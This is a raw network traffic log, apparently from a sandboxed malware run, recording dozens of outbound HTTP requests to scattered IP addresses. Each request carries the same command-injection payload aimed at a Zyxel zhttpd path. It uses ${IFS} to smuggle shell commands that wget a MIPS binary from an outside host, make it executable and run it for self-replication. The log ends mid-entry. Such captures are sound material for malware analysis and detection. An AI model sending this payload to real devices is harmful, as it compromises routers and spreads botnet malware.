                                        Jan 14, 2024 16:18:41.374847889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3361192.168.2.1336726156.23.215.65443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.374905109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3362192.168.2.133973053.183.148.162443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.374928951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3363192.168.2.1346932189.73.227.90443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.374991894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3364192.168.2.1360174115.21.159.125443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.375040054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3365192.168.2.135433475.47.37.18443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.375068903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3366192.168.2.1352236148.251.159.160443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.375117064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3367192.168.2.134904491.117.34.141443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.375174046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3368192.168.2.1337594133.53.229.108443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.375193119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3369192.168.2.1347388148.150.28.230443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.375247002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3370192.168.2.1344282112.179.234.248443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.375302076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3371192.168.2.1339318174.48.33.218443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.375330925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3372192.168.2.1338622105.13.188.11443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.375370026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3373192.168.2.1342216157.10.133.160443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.375401974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3374192.168.2.135838858.105.188.187443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.375453949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3375192.168.2.1354464182.45.250.110443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.375498056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3376192.168.2.1339370154.239.88.47443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.375530005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3377192.168.2.1335300173.91.137.246443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.375586987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3378192.168.2.134133847.164.175.25443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.375619888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3379192.168.2.134800086.16.103.122443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.375658035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3380192.168.2.1343374106.53.238.113443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.375699997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3381192.168.2.136073881.135.152.171443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.375734091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3382192.168.2.1353842137.38.220.164443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.375768900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3383192.168.2.1341980168.51.81.169443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.375818014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3384192.168.2.134697424.145.76.228443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.375869989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3385192.168.2.133417434.176.254.170443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.375901937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3386192.168.2.135584883.89.43.158443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.375941038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3387192.168.2.135672475.74.44.75443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.375991106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3388192.168.2.135515468.31.179.215443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.376018047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3389192.168.2.1355512161.62.47.3443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.376058102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3390192.168.2.1351878160.32.244.239443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.376085997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3391192.168.2.135861414.226.209.3443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.376111984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3392192.168.2.134430698.83.228.56443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.376164913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3393192.168.2.1358434201.121.188.180443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.376197100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3394192.168.2.1359968182.133.74.106443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.376241922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3395192.168.2.1354632109.156.147.160443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.376312017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3396192.168.2.133414071.2.86.152443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.376343966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3397192.168.2.1335644181.211.90.148443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.376389980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3398192.168.2.1341712164.149.115.147443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.376441002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3399192.168.2.133414834.244.94.19443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.376481056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3400192.168.2.135800446.154.225.189443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.376511097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3401192.168.2.1360762185.179.38.234443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.376564026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3402192.168.2.1347426183.106.246.45443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.376622915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3403192.168.2.1357740200.245.128.17443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.376648903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3404192.168.2.134082897.27.105.216443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.376687050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3405192.168.2.135562857.50.64.233443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.376722097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3406192.168.2.1355700161.19.32.163443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.376759052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3407192.168.2.1335786158.171.128.140443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.376790047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3408192.168.2.1347900124.169.215.173443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.376821995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3409192.168.2.134493462.93.133.251443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.376853943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3410192.168.2.134440888.99.26.217443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.376960039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3411192.168.2.133879435.190.160.37443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.376996994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3412192.168.2.1333104158.163.243.46443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.377007961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3413192.168.2.1359474170.57.225.199443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.377058983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3414192.168.2.1353780223.72.221.227443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.377079010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3415192.168.2.1333032183.28.42.114443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.377130032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3416192.168.2.134825039.80.209.128443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.377150059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3417192.168.2.134344298.136.83.201443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.377208948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3418192.168.2.133720091.138.2.30443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.377259970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3419192.168.2.135180857.62.40.200443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.377293110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3420192.168.2.1358820124.16.121.108443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.377324104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3421192.168.2.133588648.116.238.195443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.377383947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3422192.168.2.1353498164.215.0.216443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:41.377408981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3423192.168.2.1345614113.109.131.20443
                                        TimestampBytes transferredDirectionData
